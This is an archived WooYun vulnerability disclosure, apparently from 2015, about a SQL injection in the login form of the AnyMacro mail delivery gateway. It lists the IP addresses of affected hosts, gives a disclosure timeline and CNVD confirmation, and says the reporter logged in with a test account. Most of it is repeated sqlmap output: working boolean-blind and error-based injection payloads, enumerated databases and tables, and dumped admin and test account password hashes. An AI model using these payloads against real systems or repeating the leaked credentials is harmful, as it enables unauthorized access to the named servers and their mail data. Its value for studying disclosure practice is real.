乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-11: 细节已通知厂商并且等待厂商处理中 2015-03-16: 厂商已经确认,细节仅向厂商公开 2015-03-19: 细节向第三方安全合作伙伴开放 2015-05-10: 细节向核心白帽子及相关领域专家公开 2015-05-20: 细节向普通白帽子公开 2015-05-30: 细节向实习白帽子公开 2015-06-14: 细节向公众公开
rt
公司主页http://www.anymacro.com/index.htm安宁邮件投递网关系统登录框参数admin存在post注入地址
https://115.25.86.234/https://115.25.86.236/https://115.25.86.233/https://115.25.86.235/
admin的密码解不开,只登录了anytest
sqlmap identified the following injection points with a total of 198 HTTP(s) requests:---Parameter: admin (POST) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd---web application technology: Apacheback-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: admin (POST) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd---web application technology: Apacheback-end DBMS: MySQL 5.0Database: deliver[13 tables]+---------------------------------------+| domain || user || admin || config || defer || deliverlog || erruser || eventlog || ipdata || mailserver || proclog || queue || total |+---------------------------------------+Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: admin (POST) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd---web application technology: Apacheback-end DBMS: MySQL 5.0Database: deliverTable: admin[8 columns]+----------+------------------+| Column | Type |+----------+------------------+| date | datetime || no | int(11) unsigned || admin | varchar(64) || descp | varchar(100) || disabled | char(2) || flag | char(2) || ip | varchar(100) || passwd | varchar(32) |+----------+------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: admin (POST) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd---web application technology: Apacheback-end DBMS: MySQL 5.0Database: deliverTable: admin[2 entries]+---------+----------------------------------+| admin | passwd |+---------+----------------------------------+| admin | $1$655765$t1uDwWFXaeykAb0zQtlLm/ || anytest | anb1arfj9f85U |+---------+----------------------------------+
联系厂家
危害等级:高
漏洞Rank:11
确认时间:2015-03-16 13:10
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。
暂无